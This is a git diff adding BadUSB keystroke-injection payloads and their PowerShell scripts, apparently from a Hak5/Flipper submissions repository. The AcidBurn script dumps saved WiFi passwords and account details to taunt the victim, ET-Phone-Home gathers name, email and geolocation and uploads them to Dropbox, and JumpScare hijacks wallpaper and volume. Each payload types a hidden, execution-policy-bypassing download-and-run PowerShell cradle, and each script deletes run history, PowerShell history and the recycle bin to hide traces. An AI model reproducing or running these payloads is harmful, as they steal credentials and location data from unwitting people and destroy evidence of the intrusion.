+ ($Networks| Out-String) >> $Env:temp\$FileName
+
+ $content = [IO.File]::ReadAllText("$Env:temp\$FileName")
+
+
+# this is the message that will be coded into the image you use as the wallpaper
+
+ $hiddenMessage = "`n`nMy crime is that of curiosity `nand yea curiosity killed the cat `nbut satisfaction brought him back `n with love -Jakoby"
+
+# this will be the name of the image you use as the wallpaper
+
+ $ImageName = "dont-be-suspicious"
+
+<#
+
+.NOTES
+ This will get take the information gathered and format it into a .jpg
+#>
+
+ Add-Type -AssemblyName System.Drawing
+
+ $filename = "$env:tmp\foo.jpg"
+ $bmp = new-object System.Drawing.Bitmap $w,$h
+ $font = new-object System.Drawing.Font Consolas,18
+ $brushBg = [System.Drawing.Brushes]::White
+ $brushFg = [System.Drawing.Brushes]::Black
+ $graphics = [System.Drawing.Graphics]::FromImage($bmp)
+ $graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height)
+ $graphics.DrawString($content,$font,$brushFg,500,100)
+ $graphics.Dispose()
+ $bmp.Save($filename)
+
+# Invoke-Item $filename
+
+<#
+
+.NOTES
+ This will take your hidden message and use steganography to hide it in the image you use as the wallpaper
+ Then it will clean up the files you don't want to leave behind
+#>
+
+ echo $hiddenMessage > $Env:temp\foo.txt
+ cmd.exe /c copy /b "$Env:temp\foo.jpg" + "$Env:temp\foo.txt" "$Env:USERPROFILE\Desktop\$ImageName.jpg"
+
+ rm $env:TEMP\foo.txt,$env:TEMP\foo.jpg -r -Force -ErrorAction SilentlyContinue
+
+
+#############################################################################################################################################
+
+
+# This will open up notepad with all their saved networks and passwords and taunt them
+
+
+ $s.Speak("wanna see something really cool?")
+ Set-WallPaper -Image "$Env:USERPROFILE\Desktop\$ImageName.jpg" -Style Center
+ $s.Speak("Look at all your other passswords I got..")
+ Start-Sleep -Seconds 1
+ $s.Speak("These are the wifi passwords for every network you've ever connected to!")
+ Start-Sleep -Seconds 1
+ $s.Speak("I could send them to myself but i wont")
+
+}
+
+# echo statement used to track progress while debugging
+echo "All Wifi Passes Done"
+}
+
+
+###########################################################################################################
+
+<#
+
+.NOTES
+ Password last Set
+ This function will custom tailor a response based on how long it has been since they last changed their password
+#>
+
+
+ function Get-Days_Set {
+
+ #-----VARIABLES-----#
+ # $pls (password last set) = the date/time their password was last changed
+ # $days = the number of days since their password was last changed
+
+ try {
+
+ $pls = net user $env:UserName | Select-String -Pattern "Password last" ; $pls = [string]$pls
+ $plsPOS = $pls.IndexOf("e")
+ $pls = $pls.Substring($plsPOS+2).Trim()
+ $pls = $pls -replace ".{3}$"
+ $time = ((get-date) - (get-date "$pls")) ; $time = [string]$time
+ $DateArray =$time.Split(".")
+ $days = [int]$DateArray[0]
+ }
+
+ # If no password set date is detected funtion will return $null to cancel Sapi Speak
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "Day password set not found"
+ return $null
+ -ErrorAction SilentlyContinue
+ }
+
+
+# ENTER YOUR CUSTOM RESPONSES HERE
+#----------------------------------------------------------------------------------------------------
+ $newPass = "$pls was the last time you changed your password... You changed your password $days days ago.. I have to applaud you.. at least you change your password often. Still did not stop me! "
+
+ $avgPASS = "$pls was the last time you changed your password... it has been $days days since you changed your password, really starting to push it, i mean look i am here. that tells you something "
+
+ $oldPASS = "$pls was the last time you changed your password... it has been $days days since you changed your password, you were basically begging me to hack you, well here i am! "
+#----------------------------------------------------------------------------------------------------
+
+ if($days -lt 45) { return $newPass
+
+ }elseif($days -gt 44 -and $days -lt 182) { return $avgPASS
+
+ }else { return $oldPASS
+
+ }
+}
+
+# echo statement used to track progress while debugging
+echo "Pass last set Done"
+
+###########################################################################################################
+
+<#
+
+.NOTES
+ Get Email
+ This function will custom tailor a response based on what type of email the target has
+#>
+
+function Get-email {
+
+ try {
+
+ $email = GPRESULT -Z /USER $Env:username | Select-String -Pattern "([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})" -AllMatches;$email = ("$email").Trim()
+
+ $emailpos = $email.IndexOf("@")
+
+ $domain = $email.Substring($emailpos+1) #.TrimEnd(".com")
+
+ }
+
+# If no email is detected function will return backup message for sapi speak
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "An email was not found"
+ return "you're lucky you do not have your email connected to your account, I would have really had some fun with you then lol"
+ -ErrorAction SilentlyContinue
+ }
+
+# ENTER YOUR CUSTOM RESPONSES HERE
+#----------------------------------------------------------------------------------------------------
+ $gmailResponse = "At least you use G Mail.. we should be friends. If you are down just email me back, ill message you at $email. That is your email right?"
+ $yahooResponse = "a yahoo account seriously? you are either in your 50's or just got done doing some time, a lot of it.. $email .. this is sad"
+ $hotmailResponse = "really?. you have a hotmail account? $email .. I am sending this to the f b I they need to check your hard drive"
+ $otherEmailResponse = "I dead ass do not even know what this is.. $email .. hope you did not think it was safe"
+#----------------------------------------------------------------------------------------------------
+
+ if($email -like '*gmail*') { return $gmailResponse
+
+ }elseif($email -like '*yahoo*') { return $yahooResponse
+
+ }elseif($email -like '*hotmail*') { return $hotmailResponse
+
+ }else { return $otherEmailResponse}
+
+
+}
+
+# echo statement used to track progress while debugging
+echo "Email Done"
+
+###########################################################################################################
+
+<#
+
+.NOTES
+ Messages
+ This function will run all the previous functions and assign their outputs to variables
+#>
+
+$intro = "$fullName , it has been a long time my friend"
+
+$RAMwarn = Get-RAM
+
+$PUB_IPwarn = Get-PubIP
+
+$PASSwarn = Get-Pass
+
+$LAST_PASSwarn = Get-Days_Set
+
+$EMAILwarn = Get-email
+
+$OUTRO = "My crime is that of curiosity.... and yea curiosity killed the cat.... but satisfaction brought him back.... later $fullName"
+
+# echo statement used to track progress while debugging
+echo "Speak Variables set"
+
+###########################################################################################################
+
+# This turns the volume up to max level--------------------------------------------------------------------
+
+#$k=[Math]::Ceiling(100/2);$o=New-Object -ComObject WScript.Shell;for($i = 0;$i -lt $k;$i++){$o.SendKeys([char] 175)}
+
+# echo statement used to track progress while debugging
+echo "Volume to max level"
+
+###########################################################################################################
+
+<#
+
+.NOTES
+ These two snippets are meant to be used as indicators to let you know the script is set up and ready
+ This will display a pop up window saying "hello $fullname"
+ Or this makes the CapsLock indicator light blink however many times you set it to
+ if you do not want the ready notice to pop up or the CapsLock light to blink comment them out below
+#>
+
+# a popup will be displayed before freezing the script while waiting for the cursor to move to continue the script
+# else capslock light will blink as an indicator
+$popmessage = "Hello $fullName"
+
+
+$readyNotice = New-Object -ComObject Wscript.Shell;$readyNotice.Popup($popmessage)
+
+
+# caps lock indicator light
+$blinks = 3;$o=New-Object -ComObject WScript.Shell;for ($num = 1 ; $num -le $blinks*2; $num++){$o.SendKeys("{CAPSLOCK}");Start-Sleep -Milliseconds 250}
+
+
+
+#-----------------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ Then the script will be paused until the mouse is moved
+ script will check mouse position every indicated number of seconds
+ This while loop will constantly check if the mouse has been moved
+ "CAPSLOCK" will be continously pressed to prevent screen from turning off
+ it will then sleep for the indicated number of seconds and check again
+ when mouse is moved it will break out of the loop and continue theipt
+#>
+
+
+Add-Type -AssemblyName System.Windows.Forms
+$originalPOS = [System.Windows.Forms.Cursor]::Position.X
+
+ while (1) {
+ $pauseTime = 3
+ if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
+ break
+ }
+ else {
+ $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
+ }
+ }
+echo "it worked"
+
+###########################################################################################################
+
+# this is where your message is spoken line by line
+
+$s=New-Object -ComObject SAPI.SpVoice
+
+# This sets how fast Sapi Speaks
+
+$s.Rate = -1
+
+$s.Speak($intro)
+
+$s.Speak($RAMwarn)
+
+$s.Speak($PUB_IPwarn)
+
+$s.Speak($PASSwarn)
+
+WallPaper-Troll
+
+$s.Speak($LAST_PASSwarn)
+
+$s.Speak($EMAILwarn)
+
+$s.Speak($OUTRO)
+
+###########################################################################################################
+
+# this snippet will leave a message on your targets desktop
+
+$message = "`nMy crime is that of curiosity `nand yea curiosity killed the cat `nbut satisfaction brought him back"
+
+Add-Content $home\Desktop\WithLove.txt $message
+###########################################################################################################
+
+<#
+
+.NOTES
+ This is to clean up behind you and remove any evidence to prove you were there
+#>
+
+# Delete contents of Temp folder
+
+rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
+
+# Delete run box history
+
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
+
+# Delete powershell history
+
+Remove-Item (Get-PSreadlineOption).HistorySavePath
+
+# Deletes contents of recycle bin
+
+Clear-RecycleBin -Force -ErrorAction SilentlyContinue
+
+#----------------------------------------------------------------------------------------------------
+
+# This script repeadedly presses the capslock button, this snippet will make sure capslock is turned back off
+
+Add-Type -AssemblyName System.Windows.Forms
+$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')
+
+#If true, toggle CapsLock key, to ensure that the script doesn't fail
+if ($caps -eq $true){
+
+$key = New-Object -ComObject WScript.Shell
+$key.SendKeys('{CapsLock}')
+}
diff --git a/Payloads/Flip-AcidBurn/README.md b/Payloads/Flip-AcidBurn/README.md
new file mode 100644
index 0000000..8414320
--- /dev/null
+++ b/Payloads/Flip-AcidBurn/README.md
@@ -0,0 +1,112 @@
+
+
+
+
+ Table of Contents
+
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+
+
+
+# Acid Burn
+
+A script I put together to torment Call Center Scammers but can be used on your friends as well.. or Foes.
+
+## Description
+
+This program enumerates a target PC to include Operating System, RAM Capacity, Public IP, and Email associated with microsoft account.
+The SSID and WiFi password of any current or previously connected to networks.
+It determines the last day they changed thier password and how many days ago.
+Once the information is gathered the script will pause until a mouse movement is detected
+Then the script uses Sapi speak to roast their set up and lack of security
+If wifi networks and passwords are detected wallpaper will be changed to image displaying that information
+Image generated will be saved to desktop, steganography is used to put hidden message at bottom of binary output of image generated
+
+## Getting Started
+
+### Dependencies
+
+* Windows 10,11
+
+(back to top)
+
+### Executing program
+
+* Plug in your Bash Bunny
+* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
+* Enumerate and get Full Name, Amount of RAM, Public IP, Wifi Password Length, Wifi Networks and Passwords, Day Password was last changed, Email
+* Custom responses have been programmed to roast the target based on the information gathered during enumeration phase
+* Wifi Networks and passwords will be generated into an image that will be saved on the desktop
+* Image opened in notepad will reveal a hidden message at the bottom of the binary output
+* Script will freeze until a mouse movement is detected
+* Sapi Speak will be used to speak out loud the custom responses
+* Desktop wallpaper will be changed to the image of the targets Wifi Networks and Passwords
+* Text file will be left on the target desktop with whatever message you choose
+
+
+
+(back to top)
+
+## Contributing
+
+All contributors names will be listed here
+
+I am Jakoby
+
+Arf
+
+(back to top)
+
+## Version History
+
+* 0.1
+ * Initial Release
+
+(back to top)
+
+
+## Contact
+
+I am Jakoby
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Project Link: https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/RubberDucky/Payloads/RD-AcidBurn)
+
+
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [MG](https://github.com/OMG-MG)
+* [0iphor13](https://github.com/0iphor13)
+* [PhilSutter](https://github.com/PhilSutter)
+
+
+(back to top)
diff --git a/Payloads/Flip-AcidBurn/hacked-wallpaper.jpg b/Payloads/Flip-AcidBurn/hacked-wallpaper.jpg
new file mode 100644
index 0000000..d04161d
Binary files /dev/null and b/Payloads/Flip-AcidBurn/hacked-wallpaper.jpg differ
diff --git a/Payloads/Flip-AcidBurn/payload.txt b/Payloads/Flip-AcidBurn/payload.txt
new file mode 100644
index 0000000..ebb7746
--- /dev/null
+++ b/Payloads/Flip-AcidBurn/payload.txt
@@ -0,0 +1,16 @@
+REM Title: AcidBurn
+REM
+REM Author: I am Jakoby
+REM
+REM Description: This payload is meant to torment your target to the fullest extent. Mission to recon then roast. See README.md for more details
+REM
+REM Target: Windows 10, 11
+REM
+REM --------------------------------------------------------------------------------------
+REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
+REM --------------------------------------------------------------------------------------
+REM
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://raw.githubusercontent.com/I-Am-Jakoby/hak5-submissions/main/OMG/Payloads/OMG-AcidBurn/AcidBurn.ps1?dl=1; invoke-expression $pl
+ENTER
diff --git a/Payloads/Flip-ET-Phone-Home/ET-Phone-Home.ps1 b/Payloads/Flip-ET-Phone-Home/ET-Phone-Home.ps1
new file mode 100644
index 0000000..9337000
--- /dev/null
+++ b/Payloads/Flip-ET-Phone-Home/ET-Phone-Home.ps1
@@ -0,0 +1,151 @@
+
+############################################################################################################################################################
+# | ___ _ _ _ # ,d88b.d88b #
+# Title : ET-Phone-Home | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
+# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
+# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
+# Category : GENERAL | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
+# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
+# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
+# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
+# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
+# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
+#__________________________________|_________________________________________________________________________# | | ) ~ ( #
+# # / \ / ~ \ #
+# github.com/I-Am-Jakoby # \ / \~ ~/ #
+# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
+# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
+# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
+############################################################################################################################################################
+
+<#
+.SYNOPSIS
+ This script is meant to recover your device or as an advanced recon tactic to get sensitive info on your target
+
+.DESCRIPTION
+ This program is used to locate your stolen cable. Or perhaps locate your "stolen" cable if you left it as bait.
+ This script will get the Name and email associated with the targets microsoft account
+ Their geo-location will also be grabbed giving you the latitude and longitude of where your device was activated
+#>
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_Device-Location.txt"
+
+ #------------------------------------------------------------------------------------------------------------------------------------
+
+ function Get-fullName {
+
+ try {
+
+ $fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
+
+ }
+
+ # If no name is detected function will return $env:UserName
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "No name was detected"
+ return $env:UserName
+ -ErrorAction SilentlyContinue
+ }
+
+ return $fullName
+
+}
+
+$FN = Get-fullName
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+function Get-email {
+
+ try {
+
+ $email = GPRESULT -Z /USER $Env:username | Select-String -Pattern "([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})" -AllMatches;$email = ("$email").Trim()
+ return $email
+ }
+
+# If no email is detected function will return backup message for sapi speak
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "An email was not found"
+ return "No Email Detected"
+ -ErrorAction SilentlyContinue
+ }
+}
+
+$EM = Get-email
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+function Get-GeoLocation{
+ try {
+ Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace
+ $GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object
+ $GeoWatcher.Start() #Begin resolving current locaton
+
+ while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {
+ Start-Sleep -Milliseconds 100 #Wait for discovery.
+ }
+
+ if ($GeoWatcher.Permission -eq 'Denied'){
+ Write-Error 'Access Denied for Location Information'
+ } else {
+ $GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results.
+ }
+ }
+ # Write Error is just for troubleshooting
+ catch {Write-Error "No coordinates found"
+ return "No Coordinates found"
+ -ErrorAction SilentlyContinue
+ }
+
+}
+
+$GL = Get-GeoLocation
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+echo $FN >> $env:TMP\$FileName
+echo $EM >> $env:TMP\$FileName
+echo $GL >> $env:TMP\$FileName
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+# Upload output file to dropbox
+
+$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN"
+$TargetFilePath="/$FileName"
+$SourceFilePath="$env:TMP\$FileName"
+$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
+$authorization = "Bearer " + $DropBoxAccessToken
+$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
+$headers.Add("Authorization", $authorization)
+$headers.Add("Dropbox-API-Arg", $arg)
+$headers.Add("Content-Type", 'application/octet-stream')
+Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This is to clean up behind you and remove any evidence to prove you were there
+#>
+
+# Delete contents of Temp folder
+
+rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
+
+# Delete run box history
+
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
+
+# Delete powershell history
+
+Remove-Item (Get-PSreadlineOption).HistorySavePath
+
+# Deletes contents of recycle bin
+
+Clear-RecycleBin -Force -ErrorAction SilentlyContinue
diff --git a/Payloads/Flip-ET-Phone-Home/README.md b/Payloads/Flip-ET-Phone-Home/README.md
new file mode 100644
index 0000000..6a9be0e
--- /dev/null
+++ b/Payloads/Flip-ET-Phone-Home/README.md
@@ -0,0 +1,120 @@
+
+
+
+
+ Table of Contents
+
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+
+
+
+# ET Phone Home
+
+A script I put together to locate your stolen devices, or your "stolen" baited devices
+
+## Description
+
+This program is meant to locate your devices. When someone plugs it into their computer a one liner in the run box a script
+will be downloaded and executed that grabs the Name and email of the associated microsoft account and the
+latitude and longitude of where the device was activated. This information is stored in a text document that is then uploaded to your dropbox.
+Finally the end of the script will delete the runbox and powershell history and delete the files in the TMP Folder and Recycle Bin.
+
+## Getting Started
+
+### Dependencies
+
+* DropBox - Your Shared link for the intended file
+* Windows 7,10,11
+
+(back to top)
+
+### Executing program
+
+* Your device is plugged into the targets computer
+* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
+```
+powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
+```
+Something Like What you see below will be in your cloud storage:
+
+NAME
+
+EMAIL
+
+LATITUDE AND LONGITUDE
+
+```
+Jakoby
+
+jakoby@example.com
+
+ Latitude Longitude
+ -------- ---------
+37.778919 -122.416313
+```
+
+(back to top)
+
+## Contributing
+
+All contributors names will be listed here
+
+I am Jakoby
+
+Kalani
+
+
+(back to top)
+
+## Version History
+
+* 0.1
+ * Initial Release
+
+(back to top)
+
+
+## Contact
+
+I am Jakoby
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/RubberDucky/Payloads/RD-ET-Phone-Home)
+
+
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [MG](https://github.com/OMG-MG)
+
+
+
+(back to top)
diff --git a/Payloads/Flip-ET-Phone-Home/payload.txt b/Payloads/Flip-ET-Phone-Home/payload.txt
new file mode 100644
index 0000000..a41fb71
--- /dev/null
+++ b/Payloads/Flip-ET-Phone-Home/payload.txt
@@ -0,0 +1,21 @@
+REM Title: ET-Phone-Home
+REM
+REM Author: I am Jakoby
+REM
+REM Target: Windows 10, 11
+REM
+REM Description: this script will download and execute your locator script if your wifi access point is not detected
+REM this script needs to be saved in the boot directory to have it run as soon as your device is plugged in
+REM
+REM Remeber to replace the link with your link for the intended file to download if you are using a custom variant of this payload
+REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
+REM
+REM Replace SSID with name of wifi your computer is connected to
+REM
+REM
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
+ENTER
+
+
diff --git a/Payloads/Flip-JumpScare/JumpScare.ps1 b/Payloads/Flip-JumpScare/JumpScare.ps1
new file mode 100644
index 0000000..852710c
--- /dev/null
+++ b/Payloads/Flip-JumpScare/JumpScare.ps1
@@ -0,0 +1,217 @@
+############################################################################################################################################################
+# | ___ _ _ _ # ,d88b.d88b #
+# Title : JumpScare | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
+# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
+# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
+# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
+# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
+# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
+# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
+# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
+# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
+#__________________________________|_________________________________________________________________________# | | ) ~ ( #
+# # / \ / ~ \ #
+# github.com/I-Am-Jakoby # \ / \~ ~/ #
+# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
+# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
+# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
+############################################################################################################################################################
+
+<#
+.NOTES
+ This script can be run as is with the provided execution file
+.DESCRIPTION
+ This script will download a scary image and a scream sound effect hosted with this payload and host volume will be raised to max level
+ Upon running this script it will immediately pause after the downloads until a mouse movement is detected
+ The capslock button will be pressed every 3 seconds to prevent sleep, and act as an indicator the payload is ready
+ After a mouse movement is detected their wallpaper will change to the scary image provided and the scream sound effect will play
+#>
+
+############################################################################################################################################################
+
+# Download Image; replace link to $image to add your own image
+
+$image = "https://github.com/I-Am-Jakoby/hak5-submissions/raw/main/OMG/Payloads/OMG-JumpScare/jumpscare.png"
+
+$i = -join($image,"?dl=1")
+iwr $i -O $env:TMP\i.png
+
+iwr https://github.com/I-Am-Jakoby/hak5-submissions/raw/main/OMG/Payloads/OMG-JumpScare/jumpscare.png?dl=1 -O $env:TMP\i.png
+
+# Download WAV file; replace link to $wav to add your own sound
+
+$wav = "https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-JumpScare/female_scream.wav?raw=true"
+
+$w = -join($wav,"?dl=1")
+iwr $w -O $env:TMP\s.wav
+
+
+
+#----------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This will take the image you downloaded and set it as the targets wall paper
+#>
+
+Function Set-WallPaper {
+
+<#
+
+ .SYNOPSIS
+ Applies a specified wallpaper to the current user's desktop
+
+ .PARAMETER Image
+ Provide the exact path to the image
+
+ .PARAMETER Style
+ Provide wallpaper style (Example: Fill, Fit, Stretch, Tile, Center, or Span)
+
+ .EXAMPLE
+ Set-WallPaper -Image "C:\Wallpaper\Default.jpg"
+ Set-WallPaper -Image "C:\Wallpaper\Background.jpg" -Style Fit
+
+#>
+
+
+param (
+ [parameter(Mandatory=$True)]
+ # Provide path to image
+ [string]$Image,
+ # Provide wallpaper style that you would like applied
+ [parameter(Mandatory=$False)]
+ [ValidateSet('Fill', 'Fit', 'Stretch', 'Tile', 'Center', 'Span')]
+ [string]$Style
+)
+
+$WallpaperStyle = Switch ($Style) {
+
+ "Fill" {"10"}
+ "Fit" {"6"}
+ "Stretch" {"2"}
+ "Tile" {"0"}
+ "Center" {"0"}
+ "Span" {"22"}
+
+}
+
+If($Style -eq "Tile") {
+
+ New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force
+ New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 1 -Force
+
+}
+Else {
+
+ New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force
+ New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 0 -Force
+
+}
+
+Add-Type -TypeDefinition @"
+using System;
+using System.Runtime.InteropServices;
+
+public class Params
+{
+ [DllImport("User32.dll",CharSet=CharSet.Unicode)]
+ public static extern int SystemParametersInfo (Int32 uAction,
+ Int32 uParam,
+ String lpvParam,
+ Int32 fuWinIni);
+}
+"@
+
+ $SPI_SETDESKWALLPAPER = 0x0014
+ $UpdateIniFile = 0x01
+ $SendChangeEvent = 0x02
+
+ $fWinIni = $UpdateIniFile -bor $SendChangeEvent
+
+ $ret = [Params]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $Image, $fWinIni)
+}
+
+#----------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This is to pause the script until a mouse movement is detected
+#>
+
+function Pause-Script{
+Add-Type -AssemblyName System.Windows.Forms
+$originalPOS = [System.Windows.Forms.Cursor]::Position.X
+$o=New-Object -ComObject WScript.Shell
+
+ while (1) {
+ $pauseTime = 3
+ if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
+ break
+ }
+ else {
+ $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
+ }
+ }
+}
+
+#----------------------------------------------------------------------------------------------------
+<#
+
+.NOTES
+ This is to play the WAV file
+#>
+
+function Play-WAV{
+$PlayWav=New-Object System.Media.SoundPlayer;$PlayWav.SoundLocation="$env:TMP\s.wav";$PlayWav.playsync()
+}
+
+#----------------------------------------------------------------------------------------------------
+
+# This turns the volume up to max level
+$k=[Math]::Ceiling(100/2);$o=New-Object -ComObject WScript.Shell;for($i = 0;$i -lt $k;$i++){$o.SendKeys([char] 175)}
+
+#----------------------------------------------------------------------------------------------------
+
+Pause-Script
+Set-WallPaper -Image "$env:TMP\i.png" -Style Center
+Play-WAV
+
+#----------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This is to clean up behind you and remove any evidence to prove you were there
+#>
+
+# Delete contents of Temp folder
+
+rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
+
+# Delete run box history
+
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
+
+# Delete powershell history
+
+Remove-Item (Get-PSreadlineOption).HistorySavePath
+
+# Deletes contents of recycle bin
+
+Clear-RecycleBin -Force -ErrorAction SilentlyContinue
+
+#----------------------------------------------------------------------------------------------------
+
+# This script repeadedly presses the capslock button, this snippet will make sure capslock is turned back off
+
+Add-Type -AssemblyName System.Windows.Forms
+$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')
+
+#If true, toggle CapsLock key, to ensure that the script doesn't fail
+if ($caps -eq $true){
+
+$key = New-Object -ComObject WScript.Shell
+$key.SendKeys('{CapsLock}')
+}
diff --git a/Payloads/Flip-JumpScare/README.md b/Payloads/Flip-JumpScare/README.md
new file mode 100644
index 0000000..3781747
--- /dev/null
+++ b/Payloads/Flip-JumpScare/README.md
@@ -0,0 +1,102 @@
+
+
+
+
+ Table of Contents
+
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+
+
+
+# JumpScare
+
+A script I put together to torment Call Center Scammers but can be used on your friends as well.. or Foes.
+
+## Description
+
+This script starts off using Invoke-WebRequests to download both and Image and Sound file
+Their system volume is then turned up to the max level
+The script will be paused until a mouse movement is detected
+At that point there desktop wallpaper will be changed to the scary image provided and the scream sound effect will be played
+
+## Getting Started
+
+### Dependencies
+
+* Windows 10,11
+
+(back to top)
+
+### Executing program
+
+* Plug in your device
+* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
+```
+powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://raw.githubusercontent.com/I-Am-Jakoby/hak5-submissions/main/OMG/Payloads/OMG-JumpScare/JumpScare.ps1?dl=1; invoke-expression $pl
+```
+
+(back to top)
+
+## Contributing
+
+All contributors names will be listed here
+
+I am Jakoby
+
+Arf
+
+(back to top)
+
+## Version History
+
+* 0.1
+ * Initial Release
+
+(back to top)
+
+
+## Contact
+
+I am Jakoby
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/RubberDucky/Payloads/RD-JumpScare)
+
+
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [MG](https://github.com/OMG-MG)
+* [0iphor13](https://github.com/0iphor13)
+* [PhilSutter](https://github.com/PhilSutter)
+
+
+(back to top)
